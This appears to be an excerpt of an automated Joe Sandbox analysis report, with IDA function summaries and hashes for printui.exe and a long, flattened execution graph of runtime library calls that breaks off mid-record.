                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                              • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                              • API String ID: 2613610799-4035671587
                                                                                              • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                              • Instruction ID: 92632fab1c78ccaf58f9e7bbf5aafcbf2a168d4c17c74ffcd062a01cc0cebaa1
                                                                                              • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                              • Instruction Fuzzy Hash: BFA12B76A18E42DAEB208B50F4447ADBBB0FB4AB69F419131DE0E82B54DF3ED1658740

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                              • String ID:
                                                                                              • API String ID: 642454821-0
                                                                                              • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                              • Instruction ID: 5febd5241c552f3a7992fc33f1c345ebab1a3a09df9192a3ff2177dd4cbde0a5
                                                                                              • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                              • Instruction Fuzzy Hash: 5D614779A09E06A6EB708F11F54023972B5BB46FA1F144136DA4DD33A4EF3FE8A18700

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 75 7ff616b11520-7ff616b11568 __wgetmainargs
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __wgetmainargs
                                                                                              • String ID:
                                                                                              • API String ID: 1709950718-0
                                                                                              • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                              • Instruction ID: 21be6137b4dcd520ab08a6df469c57035f0ae8e9405490271fe5336dfc8d6483
                                                                                              • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                              • Instruction Fuzzy Hash: 29E0597CD0AE47B5EA21CB50B84866437F0BB06B64B804031C50D92220EE3EA269CB44

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1249254920-0
                                                                                              • Opcode ID: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                              • Instruction ID: 7d98d514236d36a9441bcb3766635a53f685d4851f77a2758407d8f31cd251ff
                                                                                              • Opcode Fuzzy Hash: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                              • Instruction Fuzzy Hash: A2D09E99A08D1696E7289762FC150351230AB5AF55B059034CF1A85360DD3F58F94200

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 150 7ff616b11880-7ff616b11897 SetUnhandledExceptionFilter
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                              • Instruction ID: 11ba83405db1681b2eb4ca7a60033f5972ad43ef4c1e363a06e256c334a4a5d1
                                                                                              • Opcode Fuzzy Hash: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                              • Instruction Fuzzy Hash: 81B09218E25802E2D614AB22EC950A112B07B5AB21FC04430C10DC1220DE2E91BB8700

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 4104442557-0
                                                                                              • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                              • Instruction ID: d45dfba2f5c4d29e28420edf9a9e5003ad3fff386be4cf37172a538c2841b5ef
                                                                                              • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                              • Instruction Fuzzy Hash: A7111F2A605F419AEB20DF60F85426933B4FB49B68F400A35EA6D87754EF7DD6B48340

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:13.7%
                                                                                              Total number of Nodes:1311
                                                                                              Total number of Limit Nodes:116
7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80569->80571 80571->80574 80572 7ffbaafc6260 80573 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80572->80573 80576 7ffbaafc6270 80573->80576 80574->80568 80591 7ffbaafc2260 137 API calls 7 library calls 80574->80591 80576->80536 80577 7ffbaafc622e 80578 7ffbaafc6234 80577->80578 80579 7ffbaafc6283 80577->80579 80592 7ffbab038990 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 80578->80592 80593 7ffbaafc1fc0 104 API calls 2 library calls 80579->80593 80582 7ffbaafc6288 80584 7ffbab03842b 80583->80584 80586 7ffbab038430 80583->80586 80594 7ffbab053980 103 API calls std::_Locinfo::_Locinfo_ctor 80584->80594 80586->80566 80588 7ffbab03849f LeaveCriticalSection 80587->80588 80589 7ffbab0384a8 80587->80589 80589->80572 80591->80577 80592->80568 80593->80582 80598 7ffbab04f0d8 80595->80598 80599 7ffbab04f0d0 80598->80599 80600 7ffbab04f102 80598->80600 80599->80542 80600->80599 80601 7ffbab04f111 memcpy_s 80600->80601 80602 7ffbab04f14e 80600->80602 80612 7ffbab049888 13 API calls _Strcoll 80601->80612 80611 7ffbab04e5c4 EnterCriticalSection 80602->80611 80604 7ffbab04f156 80606 7ffbab04ee4c _fread_nolock 102 API calls 80604->80606 80608 7ffbab04f16d 80606->80608 80607 7ffbab04f126 80613 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80607->80613 80610 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80608->80610 80610->80599 80612->80607 80613->80599 80618 7ffbaafc4016 80614->80618 80626 7ffbaafc40e5 80614->80626 80616 7ffbaafc401c memcpy_s 80616->80550 80618->80616 80619 7ffbaafc40a6 80618->80619 80620 7ffbaafc404d 80618->80620 80622 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80619->80622 80621 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80620->80621 80627 7ffbaafc40df 80620->80627 80624 7ffbaafc4063 80621->80624 80622->80616 80624->80616 80625 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80624->80625 80625->80627 80643 
7ffbaafc19f0 104 API calls std::_Throw_Cpp_error 80626->80643 80642 7ffbaafc1950 104 API calls 2 library calls 80627->80642 80630 7ffbaafc56ce 80628->80630 80633 7ffbaafc5772 80630->80633 80636 7ffbaafc571a 80630->80636 80639 7ffbaafc56ea memcpy_s 80630->80639 80641 7ffbaafc57ad 80630->80641 80632 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80634 7ffbaafc5730 80632->80634 80637 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80633->80637 80634->80639 80640 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80634->80640 80635 7ffbaafc57a7 80644 7ffbaafc1950 104 API calls 2 library calls 80635->80644 80636->80632 80636->80635 80637->80639 80639->80552 80640->80635 80645 7ffbaafc19f0 104 API calls std::_Throw_Cpp_error 80641->80645 80642->80626 80644->80641 80646 7ffbab036550 80647 7ffbab03658f 80646->80647 80648 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80647->80648 80650 7ffbab0365d4 80648->80650 80649 7ffbab036697 80651 7ffbab0366bc 80649->80651 80652 7ffbab0366a4 80649->80652 80650->80649 80675 7ffbab031ae0 80650->80675 80690 7ffbab02edd0 138 API calls 6 library calls 80651->80690 80686 7ffbaafc3fa0 80652->80686 80658 7ffbab03663a 80660 7ffbab036670 ctype 80658->80660 80667 7ffbab036692 80658->80667 80659 7ffbab0366b4 80661 7ffbab036703 80659->80661 80691 7ffbaafc5500 102 API calls 2 library calls 80659->80691 80663 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80660->80663 80662 7ffbab036712 80661->80662 80692 7ffbaafc5500 102 API calls 2 library calls 80661->80692 80666 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 80662->80666 80668 7ffbab036684 80663->80668 80670 7ffbab036720 80666->80670 80669 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80667->80669 80669->80649 80693 7ffbab037140 102 API calls __std_exception_copy 80670->80693 80672 7ffbab036748 80673 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80672->80673 80674 7ffbab036759 80673->80674 80676 7ffbab03b118 std::_Throw_Cpp_error 104 
API calls 80675->80676 80677 7ffbab031b15 80676->80677 80678 7ffbab031b66 #21 80677->80678 80679 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80677->80679 80694 7ffbab031f80 143 API calls 3 library calls 80678->80694 80679->80678 80682 7ffbab031bb8 80695 7ffbab031c20 80682->80695 80685 7ffbab0369b0 105 API calls __std_fs_get_file_attributes_by_handle 80685->80658 80687 7ffbaafc3fc0 80686->80687 80688 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80687->80688 80689 7ffbaafc3fce 80688->80689 80689->80659 80690->80659 80691->80661 80692->80662 80693->80672 80694->80682 80696 7ffbab031c5c 80695->80696 80697 7ffbab031ee1 80696->80697 80713 7ffbab031c64 ctype 80696->80713 80698 7ffbaafc3fa0 104 API calls 80697->80698 80699 7ffbab031ef5 80698->80699 80714 7ffbab036b60 102 API calls __std_exception_copy 80699->80714 80700 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80702 7ffbab031bc8 80700->80702 80702->80685 80703 7ffbab031f0b 80705 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80703->80705 80704 7ffbab031c6b 80704->80700 80706 7ffbab031f1f 80705->80706 80708 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80706->80708 80707 7ffbaafc3ff0 104 API calls std::_Throw_Cpp_error 80707->80713 80709 7ffbab031f25 80708->80709 80710 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80709->80710 80711 7ffbab031f2b 80710->80711 80712 7ffbab031e8a #22 80712->80713 80713->80704 80713->80706 80713->80707 80713->80709 80713->80712 80714->80703 80715 7ffbaafe4180 80725 7ffbaafe4930 80715->80725 80717 7ffbaafe41c0 80718 7ffbaafe4192 80718->80717 80719 7ffbaafc2570 104 API calls 80718->80719 80720 7ffbaafe4206 80719->80720 80721 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80720->80721 80722 7ffbaafe4217 80721->80722 80731 7ffbaafe4a30 80722->80731 80724 7ffbaafe4238 80726 7ffbaafe494a 80725->80726 80730 7ffbaafe499a 80725->80730 80748 7ffbaafe4740 80726->80748 80728 7ffbaafe4984 80758 7ffbab04e1f4 80728->80758 
80730->80718 80806 7ffbaafc5de0 80731->80806 80738 7ffbaafe4b49 80834 7ffbaafe4830 80738->80834 80740 7ffbaafe4bc3 80742 7ffbaafc2570 104 API calls 80740->80742 80747 7ffbaafe4b79 80740->80747 80743 7ffbaafe4c2d 80742->80743 80745 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80743->80745 80746 7ffbaafe4c3e 80745->80746 80747->80724 80749 7ffbaafe4763 80748->80749 80750 7ffbaafe4812 80748->80750 80749->80750 80756 7ffbaafe476d 80749->80756 80751 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80750->80751 80752 7ffbaafe4821 80751->80752 80752->80728 80753 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80754 7ffbaafe47ce 80753->80754 80754->80728 80755 7ffbaafe47b1 80755->80753 80756->80755 80766 7ffbab04e94c 80756->80766 80759 7ffbab04e224 80758->80759 80792 7ffbab04e0d0 80759->80792 80761 7ffbab04e23d 80762 7ffbab04e262 80761->80762 80802 7ffbab0498c8 102 API calls 2 library calls 80761->80802 80764 7ffbab04e277 80762->80764 80803 7ffbab0498c8 102 API calls 2 library calls 80762->80803 80764->80730 80767 7ffbab04e97c 80766->80767 80774 7ffbab04e69c 80767->80774 80770 7ffbab04e9c0 80773 7ffbab04e9d5 80770->80773 80782 7ffbab0498c8 102 API calls 2 library calls 80770->80782 80773->80755 80775 7ffbab04e6bc 80774->80775 80776 7ffbab04e6e9 80774->80776 80775->80776 80777 7ffbab04e6f1 80775->80777 80778 7ffbab04e6c6 80775->80778 80776->80770 80781 7ffbab0498c8 102 API calls 2 library calls 80776->80781 80783 7ffbab04e5dc 80777->80783 80790 7ffbab049bfc 102 API calls 2 library calls 80778->80790 80781->80770 80782->80773 80791 7ffbab04e5c4 EnterCriticalSection 80783->80791 80785 7ffbab04e5f9 80786 7ffbab04e61c 104 API calls 80785->80786 80787 7ffbab04e602 80786->80787 80788 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80787->80788 80789 7ffbab04e60d 80788->80789 80789->80776 80790->80776 80793 7ffbab04e0eb 80792->80793 80794 7ffbab04e119 80792->80794 80805 7ffbab049bfc 102 API calls 2 library calls 
80793->80805 80801 7ffbab04e10b __std_fs_directory_iterator_open 80794->80801 80804 7ffbab04e5c4 EnterCriticalSection 80794->80804 80797 7ffbab04e130 80798 7ffbab04e14c 102 API calls 80797->80798 80799 7ffbab04e13c 80798->80799 80800 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80799->80800 80800->80801 80801->80761 80802->80762 80803->80764 80805->80801 80807 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80806->80807 80808 7ffbaafc5e3c 80807->80808 80859 7ffbab0389d4 80808->80859 80811 7ffbaafc6150 137 API calls 80813 7ffbaafc5e76 80811->80813 80812 7ffbaafc5ec6 80814 7ffbaafc5ed3 80812->80814 80868 7ffbab038ca0 104 API calls 2 library calls 80812->80868 80813->80812 80816 7ffbaafc5eee 80813->80816 80823 7ffbaafe4c40 80814->80823 80817 7ffbaafc2570 104 API calls 80816->80817 80818 7ffbaafc5f2e 80817->80818 80819 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80818->80819 80820 7ffbaafc5f3f 80819->80820 80821 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80820->80821 80822 7ffbaafc5f81 80821->80822 80871 7ffbaafc5d00 80823->80871 80826 7ffbab03a1c8 80827 7ffbab03a20e 80826->80827 80833 7ffbaafe4b44 80827->80833 80876 7ffbab054604 80827->80876 80832 7ffbab04e1f4 102 API calls 80832->80833 80833->80738 80833->80740 80835 7ffbaafe48aa 80834->80835 80836 7ffbaafe48ca 80834->80836 81066 7ffbab04e57c 102 API calls 2 library calls 80835->81066 80838 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80836->80838 80839 7ffbaafe4914 80838->80839 80840 7ffbaafe5050 80839->80840 80841 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80840->80841 80842 7ffbaafe5080 80841->80842 80843 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80842->80843 80848 7ffbaafe50cf 80842->80848 80844 7ffbaafe50a5 80843->80844 80846 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80844->80846 80845 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80847 7ffbaafe5160 80845->80847 80846->80848 80849 7ffbab03b0f0 
__std_fs_get_file_attributes_by_handle 8 API calls 80847->80849 80858 7ffbaafe511c 80848->80858 81067 7ffbaafe5830 80848->81067 80850 7ffbaafe5170 80849->80850 80850->80747 80852 7ffbaafe512e 80853 7ffbaafe5134 80852->80853 80854 7ffbaafe5183 80852->80854 81083 7ffbab038990 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 80853->81083 81084 7ffbaafc1fc0 104 API calls 2 library calls 80854->81084 80857 7ffbaafe5188 80858->80845 80860 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80859->80860 80861 7ffbab0389f6 80860->80861 80867 7ffbab038a19 memcpy_s 80861->80867 80869 7ffbab038bcc 104 API calls std::_Throw_Cpp_error 80861->80869 80863 7ffbab038a0e 80870 7ffbab038bfc 103 API calls std::locale::_Setgloballocale 80863->80870 80864 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80866 7ffbaafc5e4c 80864->80866 80866->80811 80867->80864 80868->80814 80869->80863 80870->80867 80872 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80871->80872 80873 7ffbaafc5d77 80872->80873 80874 7ffbab0389d4 107 API calls 80873->80874 80875 7ffbaafc5d87 80874->80875 80875->80740 80875->80826 80877 7ffbab054538 80876->80877 80878 7ffbab05455e 80877->80878 80881 7ffbab054591 80877->80881 80915 7ffbab049888 13 API calls _Strcoll 80878->80915 80880 7ffbab054563 80916 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80880->80916 80883 7ffbab054597 80881->80883 80884 7ffbab0545a4 80881->80884 80917 7ffbab049888 13 API calls _Strcoll 80883->80917 80903 7ffbab05c6d4 80884->80903 80888 7ffbab0545b8 80918 7ffbab049888 13 API calls _Strcoll 80888->80918 80889 7ffbab0545c5 80910 7ffbab060698 80889->80910 80892 7ffbab0545d8 __std_fs_directory_iterator_open 80919 7ffbab04e5d0 LeaveCriticalSection 80892->80919 80894 7ffbab03a241 80894->80833 80895 7ffbab04f49c 80894->80895 80896 7ffbab04f4cc 80895->80896 81051 7ffbab04f180 80896->81051 80900 7ffbab03a25c 80900->80832 80900->80833 80901 7ffbab04f50d 80901->80900 81063 7ffbab0498c8 102 API calls 2 library calls 
80901->81063 80920 7ffbab053910 EnterCriticalSection 80903->80920 80905 7ffbab05c6eb 80906 7ffbab05c748 __std_fs_directory_iterator_open 15 API calls 80905->80906 80907 7ffbab05c6f6 80906->80907 80908 7ffbab053964 __std_fs_directory_iterator_open LeaveCriticalSection 80907->80908 80909 7ffbab0545ae 80908->80909 80909->80888 80909->80889 80921 7ffbab05ebf4 80910->80921 80913 7ffbab0606f0 80913->80892 80915->80880 80916->80894 80917->80894 80918->80894 80922 7ffbab05ec2f __crtLCMapStringW 80921->80922 80931 7ffbab05edf6 80922->80931 80936 7ffbab067098 102 API calls 4 library calls 80922->80936 80924 7ffbab05eecd 80940 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80924->80940 80926 7ffbab05edff 80926->80913 80933 7ffbab068410 80926->80933 80928 7ffbab05ee61 80928->80931 80937 7ffbab067098 102 API calls 4 library calls 80928->80937 80930 7ffbab05ee80 80930->80931 80938 7ffbab067098 102 API calls 4 library calls 80930->80938 80931->80926 80939 7ffbab049888 13 API calls _Strcoll 80931->80939 80941 7ffbab0679e0 80933->80941 80936->80928 80937->80930 80938->80931 80939->80924 80940->80926 80942 7ffbab0679f7 80941->80942 80943 7ffbab067a15 80941->80943 80996 7ffbab049888 13 API calls _Strcoll 80942->80996 80943->80942 80946 7ffbab067a31 80943->80946 80945 7ffbab0679fc 80997 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80945->80997 80952 7ffbab067ffc 80946->80952 80950 7ffbab067a08 80950->80913 80999 7ffbab067d24 80952->80999 80955 7ffbab06806f 81030 7ffbab049864 13 API calls _Strcoll 80955->81030 80956 7ffbab068087 81018 7ffbab066934 80956->81018 80960 7ffbab068074 81031 7ffbab049888 13 API calls _Strcoll 80960->81031 80988 7ffbab067a5c 80988->80950 80998 7ffbab06690c LeaveCriticalSection 80988->80998 80996->80945 80997->80950 81000 7ffbab067d5e 80999->81000 81009 7ffbab067d78 80999->81009 81000->81009 81043 7ffbab049888 13 API calls _Strcoll 81000->81043 81002 7ffbab067d6d 81044 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81002->81044 81004 
7ffbab067e41 81006 7ffbab067ea3 81004->81006 81049 7ffbab066f38 102 API calls 2 library calls 81004->81049 81005 7ffbab067df0 81005->81004 81047 7ffbab049888 13 API calls _Strcoll 81005->81047 81006->80955 81006->80956 81009->81005 81045 7ffbab049888 13 API calls _Strcoll 81009->81045 81010 7ffbab067e36 81048 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81010->81048 81013 7ffbab067de5 81046 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81013->81046 81014 7ffbab067e9f 81014->81006 81015 7ffbab049d04 _invalid_parameter_noinfo_noreturn 17 API calls 81014->81015 81017 7ffbab067f36 81015->81017 81050 7ffbab053910 EnterCriticalSection 81018->81050 81030->80960 81031->80988 81043->81002 81044->81009 81045->81013 81046->81005 81047->81010 81048->81004 81049->81014 81052 7ffbab04f1ea 81051->81052 81053 7ffbab04f1aa 81051->81053 81052->81053 81055 7ffbab04f1f6 81052->81055 81065 7ffbab049bfc 102 API calls 2 library calls 81053->81065 81064 7ffbab04e5c4 EnterCriticalSection 81055->81064 81057 7ffbab04f1fb 81058 7ffbab04f318 102 API calls 81057->81058 81059 7ffbab04f20d 81058->81059 81060 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 81059->81060 81061 7ffbab04f1d1 81060->81061 81061->80901 81062 7ffbab0498c8 102 API calls 2 library calls 81061->81062 81062->80901 81063->80900 81065->81061 81066->80836 81068 7ffbaafe5978 81067->81068 81069 7ffbaafe585c 81067->81069 81068->80852 81069->81068 81070 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81069->81070 81071 7ffbaafe586f 81070->81071 81072 7ffbab03841c std::_Lockit::_Lockit 103 API calls 81071->81072 81073 7ffbaafe58a0 81072->81073 81074 7ffbaafe5996 81073->81074 81075 7ffbaafe58dc 81073->81075 81090 7ffbab038878 104 API calls Concurrency::cancel_current_task 81074->81090 81085 7ffbab038b44 81075->81085 81078 7ffbaafe59a2 81078->80852 81083->80858 81084->80857 81091 7ffbab053c8c 81085->81091 81087 7ffbab038b5d std::_Locinfo::_Locinfo_ctor 81088 7ffbab038b86 81087->81088 81089 
7ffbab053c8c std::_Locinfo::_Locinfo_ctor 127 API calls 81087->81089 81089->81088 81090->81078 81096 7ffbab056fb8 81091->81096 81097 7ffbab056fc8 81096->81097 81100 7ffbab056fe4 std::_Locinfo::_Locinfo_ctor 81096->81100 81125 7ffbab056710 81097->81125 81099 7ffbab057012 81102 7ffbab05703b 81099->81102 81103 7ffbab056710 __crtLCMapStringW 102 API calls 81099->81103 81100->81099 81101 7ffbab056710 __crtLCMapStringW 102 API calls 81100->81101 81101->81099 81104 7ffbab057064 81102->81104 81106 7ffbab056710 __crtLCMapStringW 102 API calls 81102->81106 81103->81102 81105 7ffbab05708d 81104->81105 81107 7ffbab056710 __crtLCMapStringW 102 API calls 81104->81107 81108 7ffbab0570b6 81105->81108 81109 7ffbab056710 __crtLCMapStringW 102 API calls 81105->81109 81106->81104 81107->81105 81110 7ffbab0570df 81108->81110 81111 7ffbab056710 __crtLCMapStringW 102 API calls 81108->81111 81109->81108 81112 7ffbab057108 81110->81112 81113 7ffbab056710 __crtLCMapStringW 102 API calls 81110->81113 81111->81110 81114 7ffbab056710 __crtLCMapStringW 102 API calls 81112->81114 81115 7ffbab057131 81112->81115 81113->81112 81114->81115 81116 7ffbab053ca2 81115->81116 81117 7ffbab056710 __crtLCMapStringW 102 API calls 81115->81117 81118 7ffbab0539ac 81116->81118 81117->81116 81146 7ffbab053910 EnterCriticalSection 81118->81146 81120 7ffbab0539c8 81121 7ffbab0539ec std::_Locinfo::_Locinfo_ctor 127 API calls 81120->81121 81122 7ffbab0539d1 81121->81122 81123 7ffbab053964 __std_fs_directory_iterator_open LeaveCriticalSection 81122->81123 81124 7ffbab0539db 81123->81124 81124->81087 81126 7ffbab056800 81125->81126 81135 7ffbab056745 __crtLCMapStringW 81125->81135 81145 7ffbab053910 EnterCriticalSection 81126->81145 81128 7ffbab05676a LoadLibraryExW 81131 7ffbab05688f 81128->81131 81132 7ffbab05678f GetLastError 81128->81132 81130 7ffbab0568a8 GetProcAddress 81130->81126 81131->81130 81136 7ffbab05689f FreeLibrary 81131->81136 81132->81135 81135->81126 81135->81128 81135->81130 81144 7ffbab0567c9 
LoadLibraryExW 81135->81144 81136->81130 81144->81131 81144->81135 81147 7ffbab00e3e0 81148 7ffbaafc5de0 138 API calls 81147->81148 81149 7ffbab00e4a9 81148->81149 81150 7ffbaafe4c40 107 API calls 81149->81150 81151 7ffbab00e4d6 81150->81151 81152 7ffbab03a1c8 102 API calls 81151->81152 81155 7ffbab00e577 81151->81155 81153 7ffbab00e4f8 81152->81153 81154 7ffbab00e4fd 81153->81154 81153->81155 81156 7ffbaafe4830 102 API calls 81154->81156 81158 7ffbaafc2570 104 API calls 81155->81158 81163 7ffbab00e52d 81155->81163 81157 7ffbab00e50f 81156->81157 81160 7ffbaafe5050 131 API calls 81157->81160 81159 7ffbab00e5e1 81158->81159 81161 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81159->81161 81160->81163 81162 7ffbab00e5f2 81161->81162 81164 7ffbab00d520 81165 7ffbab00d57c 81164->81165 81168 7ffbab00d65f 81164->81168 81166 7ffbaafc8440 137 API calls 81165->81166 81167 7ffbab00d5a3 81166->81167 81173 7ffbab00d5d3 81167->81173 81179 7ffbaafe36b0 81167->81179 81169 7ffbaafc2570 104 API calls 81168->81169 81171 7ffbab00d6a1 81169->81171 81170 7ffbab00d630 81172 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81171->81172 81172->81173 81173->81170 81174 7ffbaafc2570 104 API calls 81173->81174 81175 7ffbab00d6fa 81174->81175 81176 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81175->81176 81177 7ffbab00d70e 81176->81177 81180 7ffbaafe36e3 81179->81180 81181 7ffbaafe4740 104 API calls 81180->81181 81188 7ffbaafe373b 81180->81188 81183 7ffbaafe3706 81181->81183 81182 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81184 7ffbaafe37a9 81182->81184 81185 7ffbaafe3726 81183->81185 81183->81188 81189 7ffbab04f404 81183->81189 81184->81173 81185->81188 81197 7ffbab04e9f0 81185->81197 81188->81182 81190 7ffbab04f434 81189->81190 81191 7ffbab04f180 102 API calls 81190->81191 81192 7ffbab04f44d 81191->81192 81193 7ffbab04f472 81192->81193 81206 7ffbab0498c8 102 API calls 2 library calls 81192->81206 81195 7ffbab04f487 81193->81195 81207 
7ffbab0498c8 102 API calls 2 library calls 81193->81207 81195->81185 81198 7ffbab04ea19 81197->81198 81199 7ffbab04ea04 81197->81199 81198->81199 81201 7ffbab04ea1e 81198->81201 81216 7ffbab049888 13 API calls _Strcoll 81199->81216 81208 7ffbab05cf90 81201->81208 81202 7ffbab04ea09 81217 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81202->81217 81205 7ffbab04ea14 81205->81188 81206->81193 81207->81195 81209 7ffbab05cfc0 81208->81209 81218 7ffbab05ca98 81209->81218 81212 7ffbab05cfff 81214 7ffbab05d014 81212->81214 81229 7ffbab0498c8 102 API calls 2 library calls 81212->81229 81214->81205 81216->81202 81217->81205 81219 7ffbab05cae2 81218->81219 81220 7ffbab05cab3 81218->81220 81230 7ffbab04e5c4 EnterCriticalSection 81219->81230 81231 7ffbab049bfc 102 API calls 2 library calls 81220->81231 81223 7ffbab05cae7 81224 7ffbab05cb04 103 API calls 81223->81224 81225 7ffbab05caf3 81224->81225 81226 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 81225->81226 81227 7ffbab05cad3 81226->81227 81227->81212 81228 7ffbab0498c8 102 API calls 2 library calls 81227->81228 81228->81212 81229->81214 81231->81227 81232 7ffbab00d440 81233 7ffbab00d470 81232->81233 81234 7ffbaafc8440 137 API calls 81233->81234 81235 7ffbab00d481 81234->81235 81236 7ffbab00d4b2 81235->81236 81237 7ffbaafe36b0 105 API calls 81235->81237 81237->81236 81238 7ffbab011680 81239 7ffbab011715 81238->81239 81240 7ffbaafc93e0 104 API calls 81239->81240 81241 7ffbab011777 CreateProcessW 81240->81241 81242 7ffbab0117c2 81241->81242 81248 7ffbab0117bb 81241->81248 81243 7ffbab0117f7 CloseHandle CloseHandle 81242->81243 81244 7ffbab0117ca WaitForSingleObject CloseHandle CloseHandle 81242->81244 81246 7ffbaafe5fe0 2 API calls 81243->81246 81265 7ffbaafe5fe0 81244->81265 81249 7ffbab0117f0 81246->81249 81247 7ffbab011891 ctype 81250 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81247->81250 81248->81247 81251 7ffbab0118bd 81248->81251 81253 7ffbab01181b 81249->81253 81252 
